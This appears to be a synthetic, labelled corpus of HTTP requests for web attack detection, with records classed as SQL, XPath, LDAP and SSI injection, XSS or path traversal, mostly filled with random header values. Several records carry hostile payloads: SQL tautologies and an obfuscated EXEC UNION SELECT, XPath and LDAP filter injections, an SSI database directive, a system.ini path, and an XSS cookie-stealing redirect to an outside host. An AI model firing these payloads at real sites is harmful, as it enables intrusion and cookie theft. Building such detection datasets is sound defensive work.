Host: 122.99.60.21:80
Connection: keep-alive
Accept: application/rtf
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 89.70.223.74
Cookie: clei=ati;6pahh9zna=0rrs9uttrtepM5;exrTboxnmshyl=gsiroIiODt&imo;sneq30ysibUsaln=519
Cookie2: $Version="0"
Date: Sun, 11 Jan 04 04:19:36 UTC
ETag: "bHghOmTBfDFajHx3kO"
Expect: edehn3bs=oglslt
From: ntesM@cHe7tnfpjs.org
If-Modified-Since: Wed, 19 Aug 09 02:10:03 GMT
If-Unmodified-Since: Fri, 26 Sep 08 07:16:28 GMT
If-Match: "rZAp-iTTM8z64R-D"
If-None-Match: "6L70SZ3iZksBSyZ"
If-Range: Wed, 09 Aug 06 04:23:00 CET
Max-Forwards: 2
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic Q2lJeHlnbjpzeGhCbw==
Range: -5,-835621,4-66
Referer: http://www.T0et2.net/brNoet/djAee5u.jsp
TE: chunked;q=0.8,trailers,deflate;q=0.1
Trailer: Date
User-Agent: to9s/6.6
UA-CPU: x86
UA-Disp: 2924,8513,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 750x884
Via: HTTP/4.0 www.tdcRsta.shtml, 6.1 182.74.181.39, 3.4 www.spcr.gif
Transfer-Encoding: identity
Upgrade: 7o6mn6/1.4, twjeP/1.1, eevzn/6.2
Warning: 066 177.133.141.195 "uvomreyngrucmsS" "Mon, 08 Mar 10 06:12:12 GMT"
X-Forwarded-For: 79.10.240.68
X-Serial-Number: 3656075978622
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49537
Start - Id: 48609
class: XPathInjection
PUT /eMPd2PYKrtWFmcjtiouT/eg.S.j7vOJSOR/cmdYxscript1deleteWG/iZmh@h1biGXBCldmR87/nTb.cNnQy.M/sMedZ6pWt@/tUae/aa1edmawztitMmofroyo.html? HTTP/1.1
Content-Length: 126
Content-Language: tn,otsta,sMal
Content-Encoding: compress
Content-Location: http://www.te2hhn.com/senE6i.wav
Content-MD5: YWRtSUNjblN0ZXB0ZGduRw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 18 Jul 06 07:58:55 GMT
Last-Modified: Wed, 28 Dec 05 11:55:19 UTC
Host: www.etetor.ch
Connection: k6fu
Accept: */*
Accept-Charset: koi8;q=0.2, x-mac-chinesesimp;q=0.0, iso-8859-8
Accept-Encoding: deflate;q=0.7, gzip;q=0.2
Accept-Language: Saenae-rZa;q=0.6, Ti-co, 6rt-ilh;q=0.3
Cache-Control: no-transform
Client-ip: 209.23.17.108
Cookie: 2tCzparsgt=y51imgti)rr>tt;opt-DacceptI=l;RvGUnKA.=naIsoLwX1;Eerateb9thGoLes=nUsFjGC;ekkiahb=ga(r
Cookie2: $Version="99"
Date: Thu, 04 May 06 24:33:21 CET
ETag: "pJxJ92AJ3eoiDG3vZ9"
Expect: o9huxcrn=u6an8;srief
From: oetv@ciasa9meg.net
If-Modified-Since: Tue, 25 Nov 08 10:20:34 CET
If-Unmodified-Since: Thu, 04 Mar 04 19:21:51 GMT
If-Match: "TJbu0XyWf_7r3P9"
If-None-Match: *
If-Range: Sun, 16 Jul 06 02:20:52 GMT
Max-Forwards: 4
MIME-Version: 4.8
Pragma: ytp='td'
Proxy-Authorization: Basic ZWVpVDpoZGVvc0Fz
Authorization: Digest algorithm=hSolhe8f
Range: 3-574
Referer: http://www.iBtar.gov/mo0rh/eeDAe.asp
TE: trailers,trailers,gzip
Trailer: Referer
User-Agent: Mozilla/8.6 (X11; U; Open BSD i586 3.4; sp-oa; rv:3.2.2) Gecko/31718434
UA-CPU: Sparc
UA-Disp: 7774,1775,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 474x394
Via: 1.4 69.67.178.116:729
Transfer-Encoding: deflate
Upgrade: 98segm/6.0, emke/7.4, V6urw/1.6, y7u/6.3, erasgo/2.6
Warning: 405 60.173.106.50 "flsldMhforut" 
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 3403720047412746
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hols=6aUOr'   or   ecOtir/h/child::node()[processing-instruction()=68]   or  'wmo0ae'    =   '

End - Id: 48609
Start - Id: 35577
class: XPathInjection
GET /sttosycp/nTA3..xcxmSM8Pd/srDes/@xPRjEDzqCSd/sdhd3aog/arnathtn3oaro/cdPozie35iao/hAg1kfM/g-v@CCGitOa/htMRbY/tkeetf/w@M.png?nivrhtna=%25drywremei5r%7Ebsidol&jansyevcteu4xi=e5ahw1tufCta2rdBe&-_mL.48Qh8=56a22re&eEr3ng39=510&w6libAJRuXUl=cXfTXEh&nbgheuo=%2BusropteE&feacoinhrwxha=loos%27+or++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i+%2B++++j+++%2B++k+%2B++l+%2B+++1%29%5D+%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or++%27Sthsrqr%27++%3D+++%27+++++mHc%27+++or&rngv0Aa7teOns=930747205&R8pbvHM=%2BuosI+1%28auonhtacces&eUfzNene=wdNrnluntn&6nNc=etU&2ir=antsa2u&ahtni9e=erxh%7C&sOlnnblaaaesywp=9755 HTTP/1.0
Host: www.qapedsi.be
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eti-ngscie;q=0.2, o8qeoa7r-9, Osctu8-rsoro3i
Cache-Control: no-transform
Client-ip: 252.234.242.120
Date: Tue, 09 Aug 05 18:58:12 UTC
ETag: W/"hI@P2lhb.9ij7_jV"
Expect: 100-continue
If-Modified-Since: Mon, 23 May 05 22:45:58 GMT
If-Unmodified-Since: Thu, 02 Oct 08 05:55:40 UTC
If-Match: "ShnD2NkYPCwI-Pnxb"
If-None-Match: *
If-Range: Tue, 01 Jun 04 09:16:46 GMT
Max-Forwards: 245
MIME-Version: 1.5
Pragma: no-cache
Authorization: Basic dXk2aHBudTpveTV4aXJ1eQ==
Referer: /dejs1rQ/Ouhme/tycr2/oonCe.cfm
TE: trailers,chunked;q=0.6,deflate;q=0.2
User-Agent: dni20cseeytr2
UA-OS: Win98
Via: 0.7 220.127.237.236, 4.0 208.169.115.163
X-Forwarded-For: 245.111.237.199
X-Serial-Number: 36638700307195
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35577
Start - Id: 38606
class: LdapInjection
GET /mtzT6eniAdotoisey9/iMai4tutasohr/hv/hbC0F8OOFdOpubaMlqa/cgLU3rSoVwbY/QD0JfFnc.asp?.D_zRXGg=hnodebctdoh&eme=86045476&ueCbbpc5xpahw=l+%3FmImp&a8aprc0stee=nse&se4rahtn=3387%29%28%26%28objectClass%3Decs%29%28%7C%28sn+%3D+dDya%29%28cn%3Dgs++J*%29%29&7eTy=es%3E%5Cyps1tmpRlyayMa&riatkc9te6isen=jc%25t&i7divZx-=hne%29&ueiHdimtW4e=%29+tnd HTTP/1.0
Host: 193.20.109.81:334
Connection: fm0gswge
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 26.215.206.53
Cookie: st=9218;qiyjdai5tz=ee37ikfnluiee
Cookie2: $Version="8"
Date: Thu, 22 Apr 04 14:58:45 UTC
ETag: W/"-Yp1G8Ccnlj056rU8yTq"
Expect: trilhrm
From: RwOaaelp@gdhst.com
If-Modified-Since: Fri, 01 Aug 08 13:11:41 GMT
If-Unmodified-Since: Sat, 21 Jun 08 05:38:38 GMT
If-Match: *
If-None-Match: "2IpU2wVio5qrZodNUR"
If-Range: Sat, 07 Mar 09 07:08:49 GMT
Max-Forwards: 817
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest nc=aD8e32C0
Authorization: NTLM YWRiZW9EaHB1cUN6cmdkbDdpdHJuY250NG9haGVkOXFkSWV3bmNlTnU1ZQ==
Range: -348176
Referer: /oeehwoD/sesbav/r26l.gif
TE: chunked;q=0.7
Trailer: Max-Forwards
User-Agent: a6wrsata (sSOfbyacEB)
UA-CPU: StrongARM
UA-Disp: 7529,000,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2570x635
Via: HTTP/3.3 www.ce5Ee.jpg, FTP/5.5 105.60.88.188
Transfer-Encoding: deflate
Upgrade: orntea/9.1, iEl/1.0, nny/7.6
Warning: 156 www.amoaxg.gif "c0dtoegins4aneef" 
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 325446948
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38606
Start - Id: 42172
class: SqlInjection
GET /cuFHk/stoatisIouasa/ieztdlmnoeoetenv/Letk44zC%uImrN/s38raanmodeibatee/thWp0l.e.HbW.b/rOh.nsf?nglahcorfea7=6&trs7t=7815846&ewdlqh4=a&setsc8tuI=nZQ9Ep&anefrTui=Ptt&li=ilhrun&stdinQPadD5HAD=4352209&hZbccLVpUK=epW%40tr%40J2_ci&shhainieeenb=312173098&CgtsnZ=%27+++OR++%27d4dzmt%27+++%3D+++%27+++&xilwu4Tthesn=482&dtern9=41&jubv6te2tn8=a%27%3F&zmeahaDtfxstN=a&9ohtpvt=Tmy HTTP/1.0
Host: 143.78.132.85
Connection: close
Accept: image/*, video/*, text/html
Accept-Charset: x-mac-korean;q=0.9, iso-2022-kr, iso-10646-ucs-2;q=0.0, hz-gb-2312;q=0.1, iso-2022-jp
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 36.147.99.223
Cookie: ddtiaoo=6;sRs3gr5d=rrns;t4uoiy=YxbaTteE e)egit;Q3jnBypK=Enyd;cNAnadt=15anastoGmailc
Cookie2: $Version="5"
Date: Thu, 08 Sep 05 15:06:06 CET
ETag: "rmoKgaJRhzxXhz04d"
Expect: 100-continue
From: tktabU@4ahlq0ig.org
If-Modified-Since: Sat, 14 Apr 07 21:10:42 UTC
If-Unmodified-Since: Wed, 31 Oct 07 19:18:48 GMT
If-Match: "EvnpPgVYS6AzaX1onR"
If-None-Match: *
If-Range: "MaNbJCEuM_ftW1Ee"
Max-Forwards: 5617
MIME-Version: 5.9
Pragma: eiio=ystj
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Digest opaque="eepeiier"
Range: 1010-
Referer: /oekneblA/u3rse/ctrheh/Lttna/jG8tSnbt.js
TE: trailers,gzip;q=0.3
Trailer: TE
User-Agent: Mozilla/7.2 (X11; U; Linux i386 1.5; er-fh; rv:3.8.5) Gecko/40355193
UA-CPU: StrongARM
UA-Disp: 290,899,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3499x504
Via: wh3i86/8.6 84.214.31.249, 6.6 152.243.157.211
Transfer-Encoding: gzip
Upgrade: nredd/1.9, kMnu/6.6, iarn/4.0
Warning: 076 187.215.178.176 "4XWrtebohs" 
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42172
Start - Id: 39121
class: LdapInjection
PUT /tSbMqnT2MM6H/ikFifwE/aigWbltaent7s/tfCIJH-YTy-wmy6A_/hstIep/mvfCzRs7LceusrUQp/thpey7rh4lerBA/OywZvY/oZTDXqf_v-uW/3H/5_z7Wrmtqp9n.jsp? HTTP/1.0
Content-Length: 107
Content-Language: rtmE0,hlwEi
Content-Encoding: gzip
Content-Location: http://www.ono8texd.st/rraeFq/aaoel/NLtrei.swf
Content-MD5: YXJ0dEVobGRybDhsZWxwbw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 08 Jul 09 03:56:23 CET
Last-Modified: Sat, 07 Mar 09 05:45:55 UTC
Host: www.oeea.net
Connection: close
Accept: video/*, text/*;q=0.1, video/*;q=0.5
Accept-Charset: x-mac-korean, gb2312
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.4
Cache-Control: min-fresh=20373
Client-ip: 58.102.173.136
Cookie: ej=5102;ns8sIisnt3=")(targetfilter=(o=NetscapeRoot))
Date: Sun, 20 Apr 08 16:37:03 UTC
ETag: "w0b9ghnA4RJ3qFmdT"
If-Unmodified-Since: Fri, 14 Oct 05 24:00:06 GMT
If-Match: *
If-None-Match: *
If-Range: "J44FAnSdTHf3arQ"
Max-Forwards: 68
Pragma: no-cache
Proxy-Authorization: i7tdm traeint=ncrlar
Authorization: Basic cDA1c2U6NU5vODNl
Range: 18-
Referer: /1ybAly/iyhss/al9oEt0/tGtr/eodNLi.wav
TE: trailers
User-Agent: eeRkhrl0o/9.8.3.9.2
UA-Pixels: 6666x3382
Transfer-Encoding: xdin
Upgrade: utraU/8.6, 07oswn/3.9, thkodf/2.0, 1lpi/5.9
X-Forwarded-For: 172.141.49.245
X-Serial-Number: 7713796518082043

HJfPiframeYcuSUscriptU=qa5nrnrm&trr= =ntucbmic&1illsp7moi3diN=yjEildoeAae&rtsm= qlink&BFbinYoh83Mpsy=2934

End - Id: 39121
Start - Id: 46481
class: XSS
GET /"><img src="javascript:alert(document.domain)">? HTTP/1.1
Host: www.f2javmuete.be
Connection: keep-alive
Accept: text/html;q=0.8, audio/*;q=0.6, audio/basic
Accept-Charset: us-ascii, x-mac-icelandic;q=0.8, iso-8859-9
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 98.141.212.240
Cookie: 8piepftaoe4p=tialj
Cookie2: $Version="31"
Date: Sun, 15 Nov 09 22:49:42 GMT
ETag: W/"TvYPSOTjowia_CfKxOZ"
Expect: tphW
From: musoa@e4qteeenfg.net
If-Modified-Since: Mon, 09 Oct 06 08:36:52 CET
If-Unmodified-Since: Thu, 03 Jan 08 05:49:02 GMT
If-Match: *
If-None-Match: *
If-Range: "EHImig7PXy59Qtju"
Max-Forwards: 474
Pragma: iyb7u=etotEb
Proxy-Authorization: NTLM NmlrZHBhbnJlc3cwbGVBc292aWF1YXNtcmk4YWlkc2ZsZHV4YXJwM2t1bWNI
Authorization: iserFt i8zmg=rspfnme
Range: -540
Referer: http://www.aeih3.st/hetg1oea/2exelpar.css
TE: deflate;q=0.6,trailers
Trailer: Pragma
User-Agent: E1utCuuniseod
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 139x000
Via: HTTP/1.3 16.151.24.152, FTP/5.2 www.oedi.css, loea/5.6 www.lmuilsea.shtml
Transfer-Encoding: deflate
Upgrade: i9r6of/0.6, tAiumh/1.5
Warning: 531 119.150.242.26 "jTg2xs5tderoaEpt" "Tue, 19 Feb 08 13:25:57 UTC"
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46481
Start - Id: 40756
class: SSI
POST /uDeCgUh3YdUzd/tGx5eNXFri/iUu5b7Ecg2klW_Lw1./hpB.htm? HTTP/1.0
Content-Length: 365
Content-Language: ujbo,hsai1lth,ihail
Content-Encoding: deflate
Content-Location: /fae71tNl/yittsnss/deOl.png
Content-MD5: aW95YW5oaHNlUnNkaTFhTg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 29 Dec 06 18:35:20 UTC
Host: www.tiuinapd.fr
Connection: bwjjen
Accept: */*;q=0.4
Accept-Charset: x-mac-korean;q=0.2
Accept-Encoding: *;q=0.3
Accept-Language: htelt-dp0a, Cphmb-oelaatrh, trmqio-fmd
Cache-Control: min-fresh=63011
Client-ip: 166.41.33.129
Cookie: mgRf=ghewsrzdinihp2soc;Q886b=i
Date: Mon, 19 Jan 04 18:00:39 CET
ETag: W/"StD9lTanH-1yt1o"
Expect: ehd9o
From: aits@9datnm.uk
If-Modified-Since: Wed, 18 May 05 21:34:40 CET
If-Unmodified-Since: Fri, 14 Mar 08 23:03:28 GMT
If-Match: *
If-None-Match: "FYqG5fHd@1_QMVF"
If-Range: "EsMwW-wwJZlAOTrJ2d"
Max-Forwards: 44
MIME-Version: 8.0
Pragma: a=rwagdaok
Proxy-Authorization: NTLM SW5hcmx0ZTA2Zmk3ZWt0bGUxZW50aHNpaFJvcm5wc2llZWFlZXVkbmF0cWxh
Authorization: Basic bmZuamhzOmlFSXMzeg==
Range: -5,-6430,4139-
Referer: /ijhM/rrf0/eveqy.js
TE: trailers,gzip,trailers
User-Agent: Mozilla/8.8 (Machintosh; U; Mac OS X 1.6; te-ot; rv:3.5.3) Gecko/64243077
UA-CPU: MIPS
UA-Disp: 442,6070,32
UA-Color: color16
Via: HTTP/2.7 www.nqed.shtml:616
Transfer-Encoding: deflate
Upgrade: etg/2.7
Warning: 515 255.26.146.194 "etiqarDie" 
X-Forwarded-For: 31.100.82.188
----: -------------

ahNh8abDoms9=e(|&rmzelpduNi=aajuIEzW2Zs&eotn7aEr=ku'4&bidex=tmevovipT&tcDdsuYk=<!--   #odbc statement="select arwmm,  ineWSve,   emoriqe   from     n6h09eS order  by 8, 578,     4"  -->&wEmSrvatee84ua=78T\icmitF?opt?peval4&7u=36&v6ltOruNesao25=wNethosoI&Dnar9nat1ruzgbd=oGssnwox&evaldJE4UsPQ4=%deoe1phpf&sbf8amioBdue=64ue5P ;6I

End - Id: 40756
Start - Id: 48247
class: XSS
POST /sJtrlXPnetcatdP0FmmailC/viPl0NbIauw2F/3Csock_stream19UIperl/e3hezeyetylta8/zb0u2903BYhW.mspx? HTTP/1.0
Content-Length: 116
Content-Language: 2imaa6,aurenro
Content-Encoding: gzip
Content-Location: /zIns/vDoe/herasg.mdb
Content-MD5: T203TzJNNXNVYmRlOW9ucg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 23 Sep 05 11:11:33 CET
Last-Modified: Sun, 07 Aug 05 01:11:03 CET
Host: 201.133.16.19:80
Connection: keep-alive
Accept: application/x-tar, audio/basic, video/quicktime;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.5
Cache-Control: no-transform
Cookie: saGEqaca1isck=<img src="livescript:[document.location.replace   ('http://www.nira.com/cgi-bin/tindni.cgi'+document.cookie);]    "  >;6dmMfieih=Widrtattaitt&t
Cookie2: $Version="8"
Date: Tue, 27 May 08 03:50:35 GMT
ETag: "vKPRrbQWtDJl7Ywr"
Expect: 100-continue
From: id5rnsE@noEEndoae.be
If-Modified-Since: Sun, 30 Apr 06 17:18:02 UTC
If-Unmodified-Since: Thu, 10 Apr 08 23:26:51 UTC
If-Match: "dovB8gv6dbXbckkd"
If-None-Match: *
If-Range: Wed, 08 Aug 07 01:13:16 GMT
Max-Forwards: 61
MIME-Version: 7.8
Pragma: ehe='eo7tatzn'
Proxy-Authorization: NTLM c2xhaGxnYmhveGlsbnh0bThsZXJtZXNlUm51Y2R0Y3RydG4=
Authorization: kEi7l oetde=soyyr
Referer: /eroAa.swf
TE: trailers,trailers
User-Agent: tYlnF3Uivn http://www.icTh.com
UA-CPU: 68000
UA-Disp: 344,654,32
UA-Color: color16
UA-Pixels: 2876x8013
Via: 7.0 www.sf5az.htm, 0.9 www.thltr.png
Transfer-Encoding: compress
Upgrade: HrI/0.5, e5ene/8.3
Warning: 648 51.206.96.111 "sSooi2nbx5tshecl" 
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

xysermfica=mSey&roguiS=7343&eds=mdRaestylescctaejuenaxhaving&aruas7mteSizr6o=s&1rdksi=8003060&ncrh4nxoWvx=edocument 

End - Id: 48247
Start - Id: 45308
class: PathTransversal
GET /rSevikg_DI/oct/up/oR4CTL8YaYrbKF.0.jsp?ieoeazl=mb-hLd3i&fEIoehnndsan=llocationlE&ete1r4lc=6119&ceny=sMrt&ohta=90715 HTTP/1.1
Host: 132.210.20.22
Connection: keep-alive
Accept: */*
Accept-Charset: koi8-r;q=0.3
Accept-Encoding: *
Accept-Language: oemhiE-ihol;q=0.6, 60rnaoag-otiicote, aystma-sU;q=0.5, nitn-uitgahT;q=0.2
Cache-Control: Aut=nhur
Client-ip: 149.238.74.231
Cookie: kTlshHTgroup by_=953996;iayehoour9ae5=Eefag7tha1efayu;eaemsmllyret=\WINDOWS\system.ini;i7anqDS5dthnee=tadoeoxshn
Cookie2: $Version="353"
Date: Tue, 27 Nov 07 13:04:06 GMT
If-Unmodified-Since: Sat, 17 Oct 09 14:02:46 UTC
If-Match: "XsPVET9y4pZvyFSm"
If-None-Match: *
If-Range: "CR4MQ5jIHzbWUITOP"
Max-Forwards: 3
Pragma: no-cache
Authorization: Digest algorithm=MD5-sess
Referer: http://www.6mdt.it/yL0oew/mhied/2aiTrd/asiuamJ/krrsneau.aspx
TE: gzip;q=0.1,trailers
Trailer: Authorization
User-Agent: lnal0aayrlsenerto
UA-CPU: MIPS
Via: ilg/5.0 www.tncoxT.htm, 7.0 www.f9tHhac.shtml, 5.9 www.f7epwsya.jpg
Transfer-Encoding: compress
Warning: 979 26.249.74.121 "eeOT7esu" 
X-Forwarded-For: 104.114.249.196

null

End - Id: 45308
Start - Id: 48325
class: XPathInjection
GET /a0HE32vgc.L8hobsP/odCds3F.Ft4ppZKBYrTp/u3rgnose9o5nscotokyC/SIpUZWt-YdQ/oRWtgDoDDT1GzgvsKT/dYgW/i./nN/orrO8rtimtk/nNOkF8Rxdb8DO/SqLhdx/sww6bVsi4qGfE.jpeg?wtwtsshoff=uOid%3Cslgmqaye0o&5waa2ihhiEawlh=8tlsd0riKebhcs&Pnsg5xhsahmlaU=2216&mLt=wWQ_XmOQ&srel=4 HTTP/1.0
Host: www.83s8stbza.uk:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-cyrillic;q=0.4, cp-932
Accept-Encoding: i34tt3']  |    P    | //user[ name/text()    =   '8t
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 54.114.15.189
Cookie: gn=+p'da?1[@mdocumento
Cookie2: $Version="145"
Date: Sun, 13 Dec 09 24:38:19 GMT
ETag: W/"683Tkn1roCDkCKGYEt"
Expect: 100-continue
From: tlgvoTUc@weaHAo.be
If-Modified-Since: Thu, 25 Mar 04 19:12:12 GMT
If-Unmodified-Since: Thu, 05 Jan 06 02:23:19 UTC
If-Match: *
If-None-Match: "GqHUzgI3wsImCW09wa"
If-Range: *
Max-Forwards: 0688
MIME-Version: 8.9
Pragma: yese0='u5'
Proxy-Authorization: dneDtg c5itec=enfiila
Authorization: NTLM czhUeWtsMW5hbm4zaXpVSGF0dHNTbGNoeGlscnJlbHRuQWVpb2xVbGNBaQ==
Range: 200729-
Referer: /nirmt/8tbdnio/owaait/ruwmruo/mtai.mdb
TE: gzip,trailers
Trailer: If-Modified-Since
User-Agent: 0DTYBiYZ http://www.m8hI.gov
UA-Disp: 296,6544,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 433x249
Via: 0.4 159.100.180.107
Transfer-Encoding: compress
Upgrade: ggwu/8.7, eaee/3.4, wiazc/3.1, tznuol/7.6, gfi/8.6
Warning: 589 97.236.200.85 "tutzsttjueassase" "Sat, 28 Mar 09 19:51:19 CET"
X-Forwarded-For: 49.73.220.16
X-Serial-Number: 278748120266538
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48325
Start - Id: 42272
class: SqlInjection
GET /dearrHl/ywgsm_.LqqXNhU/viaaEl/ahtymto4eRsc/inoJ39OwarlpHtiOuqY/tqkc80oJ5hb/r2gn0to/hcr/66tddp/21nyVs.tiff?heyIdrncheicni=eopt&i2kimekd=328&w0ioee7nreysito=n9rm%26r&hAtL=edmygPhhhSE2be&wwr=92429&v7iodRTjrba=tnpd&0esOerbsgaEpy=and++++0%3C%3E%28select+++++count%28*%29+++from++++teoel++where+++++u6hnlak%3C%3E%29&LHbgsoundQZox8X=%2FH+Nogh+t7owinnt HTTP/1.0
Host: www.sepr.uk:33633
Connection: eodg
Accept: application/*, text/xml
Accept-Charset: ks_c_5601-1987;q=0.6, x-mac-cyrillic;q=0.9, windows-1254
Accept-Encoding: compress
Accept-Language: rtsfn-nt1eee;q=0.0, hhpac-ldg4o0, t-DQ;q=0.5, 9enec-Si41;q=0.3, hoEbhgaa-r;q=0.1
Cache-Control: only-if-cached
Client-ip: 241.101.146.87
Cookie: WWo8dB=679719;7w4p7i4eu1=hic;oisie0otgisg=dis9tofeIheho;til
Cookie2: $Version="520"
Date: Sat, 05 May 07 10:28:51 CET
ETag: "cQI1KzijYNcy.dQfk"
Expect: sRremose
From: eethwr@T5iivnsieh.be
If-Modified-Since: Fri, 05 Mar 10 18:21:07 CET
If-Unmodified-Since: Wed, 09 Jan 08 20:55:22 GMT
If-Match: *
If-None-Match: "k.6zp6wLzF7tn3HWj"
If-Range: Fri, 04 May 07 23:40:22 UTC
Max-Forwards: 2
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWVlT2luN25CbmdyZmFla3JsbDF0YXkzZ3Rpa2xmbW4=
Authorization: Digest response="4C4c0629d703FA98f52ea8Ee39dFEAa8"
Range: -949568,-7
Referer: http://www.icru96m.biz/ikloco/Xltw/mepe/yatets3t.html
TE: chunked;q=0.2,chunked;q=0.3,gzip;q=0.8
Trailer: From
User-Agent: Mozilla/5.9 (Windows; U; WinNT 2.7; TL-n7; rv:0.7.9) Gecko/88079301
UA-CPU: PowerPC
UA-Disp: 8058,0040,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0775x379
Via: 5.7 www.leXagn.shtml, 5.1 www.rQ1pt.html
Transfer-Encoding: deflate
Upgrade: gtaeas/6.8, ae9e/5.6, rdaei/1.7, ilto/8.7, n5w/5.4
Warning: 301 34.243.209.148:30161 "olzejaFnho9ieieodT" "Fri, 02 Jan 09 11:48:48 CET"
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 280200406213
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42272
Start - Id: 47616
class: XSS
GET /eela1rbr7tnhvaiUSleN/ooiesd5e5aemsilo/e6.1RMIuQ@GT/rDudnNe/n2.4oGaRMfzQl5LP/dch.js?IZVufq=3duwtugyrqEoo&a4gueenree8aD=%3Cdiv+++++style++%3D%22++behaviour%3A++++url%28%5Bhttp%3A%2F%2Fwww.iciten.com%2Fscript%2FsifctlrAcs.asmx%5D%29%3B+%22++%3E&gp_aww=0&olhUte80iTet=evaly%3Eai%26ipositioninclude4nl&ube=r&q0nSemp4a8l=2946632&e9owsdeimc=325868&ahjwf=srebc&nettleus=5&mdp=httpphp8aijaSeE%27bvo&HRaEvf=azz4a&G@rH3=d8+%25tgriiuinputntn&f3iInsattltH=jw9i&Zu.GSV64=24 HTTP/1.1
Host: 199.174.124.35:80
Connection: close
Accept: image/gif, application/*;q=0.5
Accept-Charset: euc-jp;q=0.3, iso-8859-4, x-mac-arabic, x-mac-arabic;q=0.2, x-mac-icelandic;q=0.0
Accept-Encoding: *;q=0.1
Accept-Language: hertdihe-zwihtm;q=0.6, paoo-obeoY8c, t4retraa-oeheitRo;q=0.8, awmToaX-axIinha;q=0.4, 5ista-cualdds
Cache-Control: max-age=97351
Client-ip: 254.77.17.52
Cookie: e7t5ccAnonsN3rm=584;updateE2H=69369966;i4Slalrsohi=31;3idgedoteodidoz=qa4FPCpWJwL;hebtn2bcOe=aimtsystemfhp;caeghana=7189165
Cookie2: $Version="33"
Date: Sat, 05 Apr 08 24:49:00 UTC
ETag: W/"UtO@wp6ZQnYA6s5"
Expect: 100-continue
From: drEnA@edtwavoDoa.com
If-Modified-Since: Mon, 24 Nov 08 17:55:18 UTC
If-Unmodified-Since: Mon, 03 Mar 08 02:30:33 UTC
If-Match: "AlnZlixlOIErmXKEI"
If-None-Match: "ofCqQFy3emovqw4R"
If-Range: Fri, 02 Apr 10 07:39:45 UTC
Max-Forwards: 92
MIME-Version: 9.1
Pragma: rqrr=aMkr8
Proxy-Authorization: 0yeere 7neifuPe=Hsrbcstt
Authorization: Basic dGVubjpha3Rl
Range: 393273-
Referer: http://www.dtMl.uk/rosydd.htm
TE: trailers
Trailer: Expect
User-Agent: Y2stdu/3.3.7.1
UA-CPU: StrongARM
UA-Disp: 722,561,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 608x141
Via: E0Swn/3.4 www.tnfHs1cs.tiff
Transfer-Encoding: identity
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 114 www.elevwen.jpg "oserePt" 
X-Forwarded-For: 19.35.93.68
X-Serial-Number: 2524902769036083814
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47616
Start - Id: 41640
class: SqlInjection
GET /eisttAi/eqM/hsoesihC/lq8yYaeWIZ_w/qEWaHpxiMNYi/nH/f6Y__wqyqS-L/cekoiN6kK_/qoh6Kf9metakKb4B6z/fXAdGK04/ab3kmeX3aIxrYcwq0F/wcmyNIfSmLLHYP6JwSE.pl?ef52htaccesnT1oQ-m=%3B+++EXEC%28++++%27UNI%27%2B%27ON%27%2B%27+++%27%2B%27SEL%27%2B%27ECT++++++%27A7knvsj%27%2C9%2C5940259%2C%27etD%27%2C9++FROM++de0Qhrr%29 HTTP/1.1
Host: www.5nendta.de:80
Connection: close
Accept: audio/basic;q=0.0
Accept-Charset: *
Accept-Encoding: identity;q=0.4
Accept-Language: *;q=0.3
Cache-Control: max-age=7
Client-ip: 250.22.146.196
